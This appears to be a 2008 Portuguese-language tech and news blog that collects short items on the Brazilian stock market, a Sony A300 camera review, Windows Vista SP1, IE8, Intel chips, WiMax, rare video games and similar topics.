A realização de lucros por investidores que vendem ações faz a Bolsa de Valores de São Paulo devolver nesta quarta (19) parte da alta de 3,2% do dia anterior.

Às 14h04, o Ibovespa registrava queda de 2,90%, aos 60.135 pontos.

No início do pregão, a bolsa chegou a operar em alta, mas, perto das 11h, inverteu a tendência.

De acordo com especialistas, o mercado tenta digerir a forte alta da terça-feira, após o corte de 0,75 ponto percentual do juro dos Estados Unidos, que caiu para 2,25%, e a divulgação de resultados melhores do que o esperado do Lehman Brothers e do Goldman Sachs. Os índices das bolsas de Wall Street tiveram a maior alta em cinco anos.

"Tem alguns investidores preferindo realizar lucros", disse Júnior Hydalgo, analista da corretora Cruzeiro do Sul.

Notícias

Segundo ele, o noticiário do início do dia foi positivo. O banco Morgan Stanley reportou lucro também acima das expectativas. E o Departamento de Supervisão das Empresas Imobiliárias Federais (OFHEO, na sigla em inglês), dos Estados Unidos, aprovou mudanças nas exigências de capital para as empresas de financiamento imobiliário Fannie Mae e Freddie Mac que permitirão que as duas fortaleçam o mercado hipotecário.

Mas as bolsas de Wall Street eram pressionadas pelas perdas mais fortes das ações de empresas de energia, acompanhando a queda dos preços do petróleo.

Na bolsa paulista, as ordens de venda caíam com mais força sobre os papéis da Vale, dentre as mais negociadas. As ações preferenciais da mineradora recuavam 2,75%, a R$ 46,39.

Mas a líder de perdas eram as ações preferenciais da Cesp (Companhia Energética de São Paulo) , com baixa de 6,67%, cotadas a R$ 42.

"Isso tem a ver com preocupações quanto à venda da empresa", disse Hidalgo, referindo-se ao leilão de privatização marcado para o próximo dia 26.

Planos de bomba atômica vão parar na internet, diz site

Planos oficiais para a construção de uma bomba atômica foram expostos na internet na semana passada pelo polêmico site Wikileaks, de acordo com reportagem publicada na terça-feira (19) pelo portal DailyTech. Os esquemas seriam referentes à bomba atômica ‘Fat Man’, detonada pelos EUA sobre a cidade japonesa de Nagasaki, em 1945.


Os planos mostrariam uma descrição britânica da arma desenvolvida nos laboratórios de Los Alamos, nos EUA. Eles fariam parte do Penney Report, conjunto de documentos que havia sido inicialmente liberado e depois proibido pelas autoridades inglesas em 2002.

Segundo o Wikileaks, os planos – datados de 1947 – ainda seriam de domínio público. Para o site, embora o conjunto de documentos tenha tido seu acesso proibido para o público, o governo não teria tentado contatar pessoas que já estariam com a documentação em mãos – um grupo de papéis com o nome oficial de “AVIA 65/1163 Implosion”.

Sem novidade

De acordo com a matéria do DailyTech, o Wikileaks – endereço famoso por publicar documentos secretos de vários governos e que foi alvo de diversas tentativas de fechamento – não vê nenhum problema em disponibilizar na internet planos de armas nucleares.

'The Sims 3' aposta na liberdade dos personagens

Quando "The sims" foi lançado, em 2000, os jogadores descobriram que era divertido viver no mundo virtual controlando personagens com os mesmos problemas de nossa vida real. Depois 98 milhões de cópias vendidas em todo o mundo, segundo a produtora Electronic Arts, "The sims 3" chega em 2009 com a missão de, pelo menos, manter sua base de fãs.

A estrutura de jogo será a mesma: o jogador cria seus personagens, monta famílias, constrói casas e administra os aspectos mais cotidianos da vida virtual. Felizmente, as tarefas de sempre (levar o lixo para fora, procurar emprego, cuidar dos animais de estimação e manter as relações sociais em dia) devem ser automatizadas, livrando o jogador de se tornar uma babá de suas crias virtuais.

A criação de personagens, segundo a EA, será mais profunda. Além de aprimorar detalhes visuais, como tom de pele e cortes de cabelo, "The sims 3" vai oferecer ao jogador até 700 milhões de combinações de personalidades diferentes. Será o ponto de partida para que os personagens tenham mais iniciativa e interajam com moradores da vizinhança com mais liberdade que antes.

Vício em internet deve ser considerado 'distúrbio mental'

Vício, compulsão ou doença mental? Para a publicação norte-americana "American Journal of Psychiatry", a dependência de internet, seja para jogos, e-mails ou conversas em comunicadores instantâneos e salas de bate papo, é doença mental

Em editorial da edição de março, a publicação defende que o "vício" em internet seja classificado como distúrbio mental e entre para o Manual Diagnóstico e Estatístico dos Distúrbios Mentais, cuja próxima edição será lançada em 2012.

O editorial aponta o excesso de jogos e a dependência de e-mails e mensagens de texto como principais elementos no comportamento "desequilibrado". Alguns especialistas, porém, afirmam que a pesquisa na área ainda está engatinhando, e que seria cedo para tomar decisões. Segundo eles, ainda não é possível definir quando o uso de computador cruza a fronteira entre o normal e o patológico.

Grupo de risco

Em entrevista ao jornal "Ottawa Citizen", o Dr. Jerald Block afirma que 86% dos dependentes de internet sofrem de outros distúrbios mentais que acabam se sobrepondo ao "vício" on-line. Segundo ele, a maioria dos dependentes perde a noção do tempo e passa a negligenciar necessidades básicas como dormir e comer.

Segundo estudo de psiquiatras britânicos publicado em 2007 no Advances in Psychiatric Treatment, uma minoria entre 5% e 10% da população on-line sofre de compulsão. E, embora os primeiros estudos indicassem que a maioria dos dependentes eram homens introvertidos em com alto nível de instrução, estudos mais recentes mostram que mulheres de meia idade formam o principal grupo de "viciados".

Os pesquisadores comparam a dependência da internet com o comportamento abusivo de álcool e drogas. Os compulsivos usariam esse meio para "fugir da realidade". Enquanto especialistas não entram em consenso sobre as pesquisas, pelo menos o rótulo dessa compulsão já está criado: "heroinware" - conjunção entre "heroína" e "software".

terça-feira, 18 de março de 2008

Consumo de álcool deve superar o de gasolina até abril

Até o próximo mês, o consumo de álcool deve superar o de gasolina no Brasil. A estimativa é da Agência Nacional do Petróleo, Gás e Biocombustível (ANP), e foi anunciada nesta terça-feira (18), no Centro do Rio.

Segundo a agência, a tendência é apontada com base no comportamento dos dois combustíveis nos últimos 12 meses, somados o consumo de álcool hidratado (vendido diretamente aos consumidores) e o de anidro (misturado à gasolina, na proporção de 25%).

Para Edson Silva, superintendente de abastecimento da ANP, se o quadro for confirmado, deve ser comemorado como “um marco histórico”. Apenas na década de 80, durante o Proálcool, o país vivia situação semelhante.

“Acho que, se forem mantidas essas condições de produção e mercado, poderemos confirmar esse quadro em abril e comemorar essa data como um marco definitivo.”

Em janeiro de 2007, o Brasil consumiu 1,520 bilhão de litros de gasolina, contra 1,088 bilhão de litros de álcool. A diferença chegava a 432 milhões de litros. Em dezembro, o consumo de gasolina atingiu 1,703 bilhão e o de álcool, 1,604 bilhão, com a diferença em 99 milhões de litros. Em janeiro deste ano, as vendas de gasolina totalizaram 1,515 bilhão e as de álcool, 1,466 bilhão, com a diferença de 49 milhões de litros.

Biodiesel

Silva mostrou-se preocupado sobre a articulação dos produtores e declarou que eles terão de se profissionalizar para produzir e dar estabilidade ao consumo crescente do produto no mercado. A afirmação foi feita durante o anúncio sobre o aumento do percentual de biodiesel no diesel de 2% para 3% a partir de 1º de julho.

Para o chamado B3 (com a adição de 3% ao diesel mineral), a estimativa de consumo no segundo semestre é de, no mínimo, 660 mil metros cúbicos. Serão realizados dois leilões em abril para aquisição de 330 mil metros cúbicos. O prazo de fornecimento será de três meses.

O consumo de óleo diesel já apresenta um aumento de 10%, considerado expressivo se comparado com o crescimento de 6,3% entre 2006 e 2007. Silva disse que o mercado exige compromisso dos produtores.

Ele lembrou que a Petrobras vai interromper contratos com duas empresas, das 11 credenciadas, por não cumprirem prazos de entrega. Elas correm o risco de perde o registro. Silva garantiu, no entanto, que isso não compromete o fornecimento.

Abandonado pela mulher, homem leiloa a própria vida no eBay

Ele pratica skydive, snowboard e mergulho. Tem moto, jet-ski e “amigos maravilhosos” - além de um carro, um emprego, uma casa na praia e um spa. Mas Ian Usher, britânico de 44 anos que mora na Austrália, está triste. Sua mulher o deixou e, por isso, ele vai leiloar “sua vida” no eBay, para recomeçar da estaca zero.

Não sem antes, claro, criar um site para anunciar a empreitada (http://alife4sale.com), fazer uma contagem regressiva de 100 dias (vídeo no YouTube) e vender on-line os capítulos com a história de sua separação (a introdução é grátis).

Quem arrematar o leilão de 7 dias que começa em 22 de junho no eBay leva até o emprego de Usher. O site Daily Mail, que publicou reportagem com o homem de coração partido, tem mais fotos dos bens leiloados, mas desconfia das reais intenções envolvidas.

Seria um golpe para se tornar famoso? Ou a amada Laura realmente era “a melhor garota do mundo”, como diz Ian?

nova máquina promove revolução entre câmeras fotográficas


Olhando rapidamente, você jamais imaginaria que a nova câmera digital Alpha A300 da Sony representa uma enorme inovação técnica. Para descobrir do que estou falando, você precisará fazer um passeio por dentro dessa máquina. Mantenha as mãos e os pés dentro do carrinho durante todo o percurso.

Em uma câmera reflex de lente única comum, ou single-lens reflex (SLR) - aqueles modelos profissionais grandes e pretos -, a luz entra pela lente e é decomposta por um espelho semi-transparente. Uma parte da luz vai para o visor ocular e a outra parte vai para o sensor de foco automático.

Quando você pressiona o botão do obturador disparador, esse espelho vira para fora do caminho da luz, revelando – aha! – um pequeno sensor de imagem retangular, o chip de computador que grava a foto.

Mistério
Com isso, você já aprendeu o suficiente para responder a um dos grandes mistérios das câmeras digitais: por que você precisa segurar essas câmeras na altura dos olhos? Por que não é possível enquadrar uma foto usando um painel SLR, como se faz com as pequenas câmeras de bolso?

Na verdade, alguns modelos recentes de SLR de fato possuem esse recurso Live View, mas na maioria dos casos é um desastre. Ele funciona virando o espelho e tirando-o do caminho, para que a luz da lente atinja o sensor de imagem, que alimenta a imagem na tela. O problema é que, quando o espelho sobe, nenhuma luz alcança o sensor de foco automático e por isso a câmera não consegue focar.

Vejamos o que acontece quando você pressiona o botão do obturador. Há um som metálico barulhento à medida que o espelho desce novamente; a tela fica preta; a câmera calcula o foco e a exposição; o espelho sobe novamente; a tela é reativada; e finalmente, cerca de um segundo depois, a foto é gravada.

Em outras palavras, o Live View nas câmeras que já estão no mercado é lento, barulhento e extremamente confuso. Toda essa parafernália ocorre porque o sensor de imagem da câmera trabalha em dobro: ele é responsável por fornecer à tela uma visualização em tempo real e por gravar a foto.

A inovação técnica da Sony na A300, portanto, foi a seguinte: “Ei cara esperto, instale outro sensor!”

Nova experiência
Nesta câmera, ao ligar o Live View, uma luz é enviada daquele espelho principal para um segundo sensor, este dedicado exclusivamente a alimentar a tela de visualização. O sensor de foco automático funciona normalmente enquanto você compõe a foto, já que o espelho nunca precisa virar.

Como resultado, o Live View passa a ser uma experiência totalmente diferente. A câmera foca rapidamente à medida que você aponta a lente, sem nunca apagar a tela. Quando você pressiona o obturador, a tela não fica no liga-desliga-liga, não há barulho metálico e não há nenhuma apresentação cambaleante de ginástica artística do espelho dentro da câmera.

Nesse sentido, a A300 proporciona uma enorme sensação de se estar usando uma câmera compacta. E era exatamente isso que a Sony esperava. A empresa tem como alvo para este modelo de 10 megapixels (custo de US$ 763 com lentes com zoom de quatro vezes) as pessoas que estão se graduando em câmeras de bolso e buscando algo mais sério.

Por cerca de US$ 140 a mais, é possível comprar a irmã de 14 megapixels dessa câmera, a A350. Não caia nessa. Dez megapixels já é resolução suficiente para impressões do tamanho de uma minivan; as fotos de 14 megapixels só vão consumir seu disco rígido mais rápido e deixar a câmera mais lenta. Além disso, se você fizer a conta, descobrirá que uma foto de 14 megapixels contém apenas 18% mais pixels em cada dimensão do que uma foto de 10 megapixels, não 40%, como se poderia naturalmente supor.

Sucesso Fotográfico
Na verdade, os fotógrafos que levam o assunto a sério tradicionalmente torcem o nariz para a idéia de compor fotos na tela. Somente um visor ocular mostra a verdadeira cena como a câmera a vê.

Mas quando funciona adequadamente, o Live View pode contribuir absurdamente para seu sucesso fotográfico, sobretudo quando a tela inteira gira para cima ou para baixo, como no caso da A300.

Por exemplo, agora você pode fotografar um desfile de rua por cima das cabeças da multidão à sua frente. Você pode fotografar animais e bebês na altura deles, sem precisar se agachar ou ajoelhar. E você consegue fotos infinitamente melhores de jovens ou pessoas que têm medo da câmera quando está sorrindo e estabelecendo contato visual do que quando se esconde atrás de um equipamento que tem cara de Darth Vader.

(No final de semana passado, meu adorável - porém avesso a câmeras - filho de 3 anos comprovou esse argumento enfaticamente. As únicas fotos decentes dele foram as que tirei segurando a câmera na altura do meu peito, com a tela virada para cima.)

Finalmente, como a tela não apaga enquanto você está fotografando, a A300 é a primeira SLR que permite rastrear um objeto em movimento na tela, fotografando todo o percurso. É uma pena que ela só consiga tirar menos de duas fotos por segundo.

Inovação
A perfeição do Live View alcançada pela Sony seria diga de nota mesmo se essa fosse a única inovação notável da câmera. Mas desde que adquiriu o setor de câmeras digitais da Konica Minolta há dois anos, a Sony vem ocupando os salões de inovação em câmeras, determinada a não ficar atrás da Canon e da Nikon.

Todos os recursos de última geração em SLR estão presentes, incluindo um sistema que se livra de qualquer poeira que possa ter entrado no sensor durante uma troca de lente; um medidor de bateria com números em porcentagem (“74%”) no lugar de linhas de medição mais grosseiras; e um foco automático que começa a funcionar assim que você segura a câmera na altura dos olhos, graças a um sensor de proximidade.

Por incrível que pareça, a Sony finalmente parou de tentar nos fazer engolir seus cartões Memory Stick caros e patenteados; a A300 aceita cartões de memória CompactFlash, o tipo de cartão mais barato, mais compacto e mais espaçoso disponível.

O layout dos botões e o design do software também são impecáveis. Detalhes como um simpático botão liga-desliga clicável, botões de auto-temporização e ISO (sensibilidade à luz) e seleção de modo de cena permitem que você trabalhe com essa máquina sem ficar vasculhando o manual a todo momento. Para uma SLR, é bastante pequena, e a sensação ao segurá-la é incrível.

Resultado final

A grande questão, claro, é: mas como ficam as fotos?

Com boa iluminação, ficam sensacionais. As cores são vívidas, o contraste é excelente, a imagem é extremamente nítida. E como se trata de uma SLR, não há retardo do obturador, aquele meio segundo de atraso depois de clicar no botão, como o que existe nas câmeras compactas.

Entretanto, você não tardará a perceber porque esta câmera custa US$ 760, e não US$ 1.500. Com pouca luminosidade, a A300 simplesmente não absorve luz suficiente. Captar objetos em movimento em ambientes internos é praticamente impossível sem o flash, mesmo usando a configuração máxima (e granulada) desta câmera de 3200 ISO. O efeito borrado é um problema grave nessas circunstâncias.

É nessas horas que você realmente vê a diferença entre o sistema de estabilização interno no corpo, adotado pela Sony, e os sistemas internos nas lentes das SLRs da Nikon e da Canon.

Sem dúvida, a abordagem do corpo da máquina economiza dinheiro, pois estabiliza toda lente que você acoplar; mas o sistema dentro das lentes, em que a estabilização é feita sob medida para cada lente individual, simplesmente funciona melhor.

Observe também que o Live View gasta bateria muito mais rápido do que usando o visor ocular. Uma carga consegue tirar 750 fotos com a tela desligada, mas apenas 400 fotos com ela ligada. Isso não é muito melhor do que você obteria com uma câmera compacta.

Mais um detalhe: não há uma tela de status totalmente móvel. Seria bacana se a tela saísse e rodasse por completo (para auto-retratos, por exemplo) e não movesse apenas para cima e para baixo. Além disso, se você está acostumado a usar as concorrentes da A300, talvez ache o visor ocular um pouco claustrofóbico.

Contudo, a A300 é uma goleada para o público a que se destina: aqueles que estão comprando uma SLR pela primeira vez. O custo-benefício desta câmera é maior do que o de suas concorrentes mais próximas da Canon ou Nikon. É agradável segurá-la e usá-la, as fotos, de modo geral, ficam magníficas e o recurso Live View intacto e a tela móvel permitem a você tirar fotos que simplesmente não conseguiria com outras SLRs.
Até pouco tempo, SLR significava single-lens reflex. Mas com a A300, a sigla acaba de ganhar um novo significado: Sony’s Live-View Revolution.

Intel confirma computador com seis 'cérebros'


A Intel confirmou nesta terça-feira (18) que vai aumentar em 50% o número de núcleos de seus processadores top de linha. O novo chip, batizado de Dunnington, terá 6 'cérebros', contra 4 da versão mais potente atualmente disponível no mercado.

Os chips 'multi-core' trabalham como vários processadores trabalhando ao mesmo tempo, multiplicando a velocidade do computador. Atualmente, boa parte dos novos PCs que chegam ao mercado têm dois ou quatro desses 'cérebros'.

Segundo a empresa, a tecnologia utilizada para a produção do Dunnington permite que, em um futuro próximo, sejam lançados processadores com 8 ou mais núcleos.

Sem levar em conta a evolução na velocidade de processamento de cada núcleo, esses chips dobrariam o poder do computador mais potente da atualidade.

O processador de 6 núcleos deve chegar ao mercado no 2º semestre de 2008.

Windows Vista SP1: 6 dúvidas sobre a 1ª grande atualização do sistema


Windows Vista SP1, por enquanto só para quem tem o Windows Vista em inglês. Quem comprou a versão em português terá que esperar até junho pelo SP1, quando o segundo pacote de traduções (onde o Brasil está incluído) será divulgado.

Confira respostas para seis dúvidas que podem atormentar usuários na primeira atualização de sistema do Windows Vista.

1) O que é o Service Pack 1 do Windows Vista?
O Service Pack é uma tradicional atualização usada pela Microsoft para acrescentar novas funções, divulgar correções de segurança em massa e corrigir eventuais problemas de usabilidade no sistema operacional Windows.

Enquanto o Windows XP espera seu terceiro Service Pack, programado para o primeiro semestre de 2008, o Windows Vista ganhou seu primeiro pacote de atualizações nesta terça-feira (18/03).

2) Onde eu posso consegui-lo?
Desde a tarde desta terça, o Service Pack 1 já pode ser baixado pelo Windows Update ou pelo Microsoft Download Center.

3) Instalar o Service Pack 1 é um processo simples?
Nem tanto, a começar pelo tamanho do arquivo – são 434 MB que precisam ser baixados, caso você não tenha aplicado nenhuma correção de segurança ao sistema.

Caso seu Windows Vista já tenha sido totalmente corrigido, o Service Pack 1 se abreviará a um arquivo de 65 MB caso seu sistema tenha 32-bits ou 125 MB caso você tenha um de 64-bits.

Testes preliminares da versão do Service Pack 1 entregue a integradores levaram nada menos que 27 minutos e exigiram três reinicializações do PC – embora demorado, o processo levou menos tempo que a uma hora alardeada pelo SP1 no início da instalação.

Vale lembrar que configurações mais poderosas, como a usada no teste feito pela PC World, decorrem em tempo menor. Se você tem um micro nem tão poderoso, é bom iniciar o processo com paciência.

4) Quais são as principais novidades do SP1?
Não espere novidades no Windows como o Service Pack 2 fez no XP, ao introduzir uma nova central de segurança com firewall e melhorar a segurança das redes sem fio.

O Service Pack 1 para Windows Vista é, segundo palavras de Ricardo Wagner, gerente de produtos Windows da Microsoft Brasil, uma série de “ajustes na linguagem para otimizar a estabilidade e performance o sistema”

E como isto se traduz para o usuário final? A otimização faz com que a cópia de arquivos seja mais rápida, que a inicialização e o fechamento do sistema ganhe alguns segundos de rapidez e que a atividade de rede não demore tanto com tráfego constante, promete a Microsoft.

A otimização de desempenho do equipamento tornará a “experiência de uso bem mais atrativa que antes” no Windows Vista, alega Wagner.

5) Eu não consigo baixar o SP1 pelo Windows Update. Por quê?

A Microsoft lista três possíveis motivos para a impossibilidade de baixar o Windows Vista Service Pack 1, além da quase impossível possibilidade de você já ter a versão final no seu sistema.

O primeiro dele é já ter no PC uma versão de testes do Service Pack 1, o que inviabiliza a instalação do pacote final – para fazê-lo, desinstale o beta do SP1.

A segunda razão é a restrição quanto ao número de línguas lançadas inicialmente no SP1 – num primeiro momento, estarão disponíveis apenas versões em inglês, francês, espanhol, alemão e japonês. Se você não tem o Windows Vista em qualquer uma das cinco línguas, terá que esperar até o fim do primeiro semestre.

A terceira é o motivo que forçou a Microsoft a atrasar por mais alguma semanas o Service Pack 1: incompatibilidade com drivers. Alguns sistemas nas línguas acima não conseguirão instalar o SP1 por problemas relacionados à incapacidade da atualização reconhecer e funcionar direito com drivers de hardware.

O Windows Update, segundo a Microsoft, verificará se o sistema do usuário tem tais drivers e, caso encontre algum, não permitirá o download do Vista SP1. Uma lista dos drivers ainda afetados pode ser consultado no site da Microsoft.

6) O que acontece se eu baixar a versão em inglês?
Você pode até baixá-la, mas não conseguirá atualizar seu PC. Segundo a Microsoft, o SP tem que ter a mesma língua do sistema operacional instalado. A tentativa de instalação do SP1 em inglês em um sistema em português é abortada com pela alegação de incompatibilidade de idioma.

Isto significa que todos os usuários que compraram o Windows Vista em português terão que esperar até o final do semestre, quando a Microsoft divulgará o SP1 em línguas como chinês, holandês, coreano e italiano, além do português.

A Microsoft Brasil diz que o país está no segundo batalhão para receber sua atualização regional, algo que deverá acontecer provavelmente antes de junho, segundo Wagner.

Embratel investe R$ 175 milhões em rede WiMax

A Embratel Participações informou nesta terça-feira que lançará no final deste mês sua rede de banda larga sem fio pela tecnologia WiMax, fruto de um investimento de 175 milhões de reais.

Em fato relevante enviado à Comissão de Valores Mobiliários (CVM) a companhia disse que tem licença para operar na frequência de 3,5 gigahertz desde um leilão promovido pela Anatel em 2003.

Além da Embratel, só dispõem de frequências para operar uma rede WiMax neste momento no Brasil as companhias Brasil Telecom e Neovia, todas adquiridas naquele leilão.

Segundo o comunicado da Embratel, a rede WiMax será implantada em 61 cidades, com a possibilidade de extensão para até 200 municípios, em um período ainda não determinado.

No final deste mês, no entanto, período que a companhia chama de primeira fase do projeto, os serviços de banda larga estarão disponíveis em 12 capitais (São Paulo, Rio, Salvador, São Luís, Brasília, Goiânia, Belém, Curitiba, Fortaleza, Belo Horizonte, Porto Alegre e Recife).

De acordo com o texto, o público alvo do serviço é compostos de pequenas e médias empresas em todo o Brasil, para as quais a companhia prestará serviço de acesso à Internet de alta velocidade.

A Agência Nacional de Telecomunicações (Anatel) chegou a promover um leilão para vender novas licenças de banda larga sem fio pelo padrão WiMax em setembro de 2006. No mesmo dia, entretanto, o leilão foi cancelado por questionamentos do Tribunal de Contas da União (TCU).

Além disso, a Anatel impediu no edital que as concessionárias de telefonia fixa participassem da disputa, mas elas obtiveram liminares na Justiça para entregar propostas e o órgão regulador ainda não conseguiu derrubá-las.

No mês passado, a Anatel deu por cancelado o leilão, que recebeu cerca de 100 propostas fechadas na época. Ainda não há previsão para que a agência promova nova licitação, o que pode ser uma vantagem competitiva da Embratel neste momento.

Games raros chegam a valer até US$ 20 mil nos EUA


Sabe aquele cartucho de videogame antigo que você deixou juntando poeira no fundo do seu armário? Ele pode valer mais do que toda sua coleção de games para o moderníssimo Xbox 360. De acordo com um estudo do site VideoGamePriceCharts, títulos raros para o NES, videogame de 8 bits da Nintendo, podem chegar a valer até US$ 20 mil.

De acordo com o site, os proprietários do cartucho Nintendo World Championships são donos do tesouro mais cobiçado da história dos games. Trata-se de um jogo criado especialmente para o campeonato mundial de games de 1990 em Los Angeles, nos EUA. O cartucho contém uma espécie de “triatlo” para os mestres do joystick: o primeiro mundo de “Super Mario bros”, uma pista do game de corrida “Rad racer” e uma maratona do clássico dos clássicos, “Tetris”. O sistema de contagem de pontos nos três desafios foi adaptado para a competição.

Os jogos utilizados durante o mundial foram gravados em cartuchos normalmente utilizados em “protótipos” da Nintendo. Cerca de 90 unidades saíram das fábricas da empresa, o que faz com que cada uma valha mais de US$ 4 mil em leilões. Mais raro ainda, a edição “oficial” do jogo, em dourado, tem apenas 26 cópias disponíveis no mundo - apenas seis delas, no entanto, têm paradeiro conhecido. Originalmente os jogos foram dados de presente a leitores da revista Nintendo Power para comemorar o evento de 1990. Dependendo do estado de conservação, o cartucho pode levar, em um leilão, entre US$ 5,1 mil e US$ 20 mi

Games obscuros também alcançam valores semelhantes ao de peças de museu. A maioria dos títulos é de jogos que tinham qualidade tão baixa que nunca tiveram chance de fazer sucesso - por isso, talvez, sejam raros. Um exemplo é o Myriad 6-in-1, lançado pela Caltron em 1992. Os jogos eram ruins até para os padrões de 1992. Vendido a US$ 69, quase o dobro do preço de um cartucho de NES comum, encalhou nas poucas lojas especializadas responsáveis por sua distribuição. A Caltron faliu antes mesmo de conseguir produzir mil unidades do game. Hoje, uma cópia vale entre US$ 500 e US$ 1,6 mil.

Outro caminho para elevar o preço dos cartuchos antigos é apelar para sexo. Como a Nintendo tinha (e ainda tem) a imagem de empresa que faz jogos para diversão familiar, poucos games podiam ser considerados eróticos. Alguns, criados pela empresa Panesian sem a autorização da Nintendo, têm títulos curiosos como “Bubble Bath Babes” (Gatas do Banho de Espuma) e “Hot Slots” (um trocadilho infame entre caça-níqueis e a suposta libertinagem das garotas que ilustravam a caixa do cartucho). É difícil fazer pornografia em sistemas com poder gráfico limitado como o NES. Resultado: os jogos, apesar de serem um exemplo de falta de qualidade de programação, valem entre US$ 500 e US$ 1,4 mil.

Robôs do futuro serão inspirados nas baratas


Os robôs do futuro poderão subir pelas paredes e ziguezaguear pelos tetos graças a técnicas motoras inspiradas nas baratas, cujos deslocamentos desafiam as leis da gravidade e estão expostos em um estudo elaborado por cientistas de Cambridge. Fruto de 300 milhões de anos de evolução, a espécie Nauphoeta cinerea utiliza duas pequenas almofadinhas debaixo de suas patas para se deslocar pelas paredes, inclusive de cabeça para baixo.

Trabalhos anteriores mostraram que estas almofadinhas estavam recobertas por uma fina película de líquido gorduroso cuja composição continua desconhecida. Esta película atua como uma gotinha de água entre duas placas de cristal, que permanecem firmemente coladas uma à outra pela tensão da superfície.

As almofadinhas da barata se grudam à superfície com a qual estão em contato e se despregam ao apoiar. Como os dois movimentos são necessários para o deslocamento, uma delas serve de “dedo do pé” para largar e outra como “calcanhar” para empurrar, constataram os zoólogos Walter Federle e Christofer Clemente, cujos trabalhos aparecem publicados na revista Proceedings of the Royal Society, equivalente britânica da Academia de Ciências.

Estas descobertas devem ser úteis aos especialistas em robótica, que também se inspiram em outras criaturas com patas adesivas, como as aranhas. Robôs humanóides são capazes, hoje em dia, de subir as paredes, mas têm grandes dificuldades na hora de descer.

domingo, 9 de março de 2008

5 novidades que farão você amar (ou odiar) o Internet Explorer 8


Mesmo que ainda esteja instável e não preparado para uso normalmente, o primeira beta do IE8 consegue dar idéia do que a Microsoft preparou para enfrentar a terceira versão do Firefox 3, disponível desde fevereiro.

Veja uma compilação com as principais novidades no Internet Explorer 8 que poderão impedir a crescente migração para o navegador de código aberto ou então levar ainda mais usuários ao Firefox. Confira um resumo das ferramentas que deverão ser os principais atrativos (ou não) do Internet Explorer 8.

WebSlices

Pense nesta função como um leitor de RSS anabolizado. Assim como com seus feeds de RSS, você pode assinar conteúdo dinâmico dentro de uma página. Mas os WebSlices são graficamente mais ricos e podem ser vistos dentro de uma nova barra no navegador com apenas um clique.

Você pode clicar sobre a página que tem pedaços dinâmicos ou simplesmente perceber o conteúdo na barra oferecida pelo navegador, em efeito semelhante ao add-on Operator para Firefox, que aponta conteúdos em MicroFormatos dentro de sites visitados.

A função é interessante apenas se desenvolvedores colocarem conteúdos que se encaixem no WebSlices em suas páginas. No momento, não existe muitas páginas prontas, o que torna difícil adivinhar se designers apoiarão a função ou se o WebSlices se tornará mais uma boa idéia que vai cedo pro túmulo.

Nova barra de Favoritos

A barra Links foi renomeada para Favoritos e ganhou algumas funções. Você pode adicionar WebSlices e feeds RSS, assim como links para páginas. A Microsoft afirma também que podem ser incluídos links para documentos dentro do disco rígido do PC do usuário.

Fica evidente que a barra sofreu uma bela evolução, deixando de ser apenas repositório dos links originais para serviços da Microsoft após a instalação do navegador. A maneira como os menus e janelas do WebSlices ou de feeds RSS são reproduzidas lembra bastante a maneira como o Firefox registra feeds desde sua primeira versão.

Activities

Esta ferramenta dá mais poder ao menu do Internet Explorer acessado pelo botão direito do mouse. Selecione determinado texto ou pare o mouse sobre um item, clique com o botão direito sobre e uma lista de ações aparece, oferecendo a possibilidade de cruzar os dados com serviços de mapa, tradutores, redes sociais ou buscadores.

Dependendo da escolha que você faz, uma janela de preview, como a reprodução de um mapa com o endereço ou da tradução do texto para sua língua nativa, se abre sobre a página.

De novo, porém, a Microsoft tropeça na concentração de serviços próprios oferecidos dentro do Activities - por mais que você busque, é difícil mudar a ferramenta de blogs do Windows Live Spaces para o Wordpress ou Blogger. Quem é fã de serviços do rival Google deverá ficar, pelo menos na versão beta, carente de usar as Activities.

Recuperação de páginas fechadas

Finalmente, o Internet Explorer faz algo que o Firefox apresentou aos (e viciou) usuários de navegadores desde sua primeira versão - recuperar o site visitado após um problema que force o browser a fechar. Caso o IE8 dê problema e feche totalmente ou apenas a aba onde você trabalhava, o software restaura o endereço automaticamente.

Dada sua presença há tanto no Firefox, a função não pode ser encarada como uma novidade no IE8, mas sim como um ajuste tardio feito pela Microsoft no seu navegador - alguém que usa o Firefox ainda consegue imaginar uma navegação sem a recuperação automática das abas?

Domínios mais fáceis de identificar

Algumas URLs são tão longas e complexas que pode ser difícil imediatamente decifrar qual o domínio visitado. Na barra de endereços do IE8, apenas o domínio (como idgnow.com.br) aparece destacado - todos o resto está em cinza claro, deixado sem destaque ao se bater os olhos.

Telefónica quer iPhone para o Dia das Mães

As conversas entre a Telefónica, uma das controladoras da operadora brasileira Vivo, e a Apple, a fabricante do iPhone, atingiram a fase final de negociação, informa reportagem publicada neste domingo na Folha e assinada pelo colunista Clóvis Rossi e pelo repórter Julio Wiziack (íntegra disponível para assinantes do jornal e do UOL).

Segundo a Folha apurou, a operadora espanhola quer colocar o aparelho à venda na América Latina dentro de dois meses. No Brasil, a Vivo já teria os aparelhos para o Dia das Mães.

Vários fatores favorecem a Telefónica na queda-de-braço com a Apple. O primeiro deles é a venda não-oficial de iPhones fora dos EUA e da Europa.

Estima-se que cerca de 1,4 milhão de iPhones estejam em atividade no momento no mercado paralelo, já que apenas 2,3 milhões de aparelhos dos 3,7 milhões vendidos estão registrados nas operadoras com quem a Apple mantém acordo de exclusividade.

Conheça cantora que é fenômeno na internet: Mallu on-line


Mallu Magalhães, cantora paulistana de apenas 15 anos. Depois de colocar quatro músicas de sua autoria no MySpace, a menina viu sua vida dar um giro de 180º. O burburinho começou nos blogs e foi para a grande imprensa _Mallu foi capa da Ilustrada, do Folhateen e virou assunto da Escuta Aqui, coluna de Álvaro Pereira Júnior. Os convites para shows surgiram aos montes, assim como a quantidade de pessoas querendo se tornar amigas da menina, principalmente em redes sociais, como o Orkut e o MySpace.

"No MySpace já aprovei mais de 4.500 pedidos. No Orkut, meu perfil ficou lotado. Criei outro, mas mesmo assim tive que recusar muita gente, porque não cabia mais. Tem dia que eu penso: vou tirar meia hora só para aceitar; mas é tanta gente, que eu clico, clico e não acaba. Depois de 280 pessoas você não agüenta mais!", disse Mallu, em entrevista à Folha na tarde de sexta-feira. "Me esforço, mas não consigo acompanhar o ritmo. E fico até triste. Mas sempre que dá eu tento. Gosto de, pelo menos, deixar um recado para a pessoa, agradecendo."

Mallu escolheu colocar suas músicas _"Don´t You Leave Me", "Tchubaruba", "J1" e "Get to Denmark"_ no MySpace pela praticidade que o site oferece. "Até para aceitar amigos é fácil, dá para aprovar dez [pedidos] de uma vez só. Para pôr música e foto também é bem fácil."

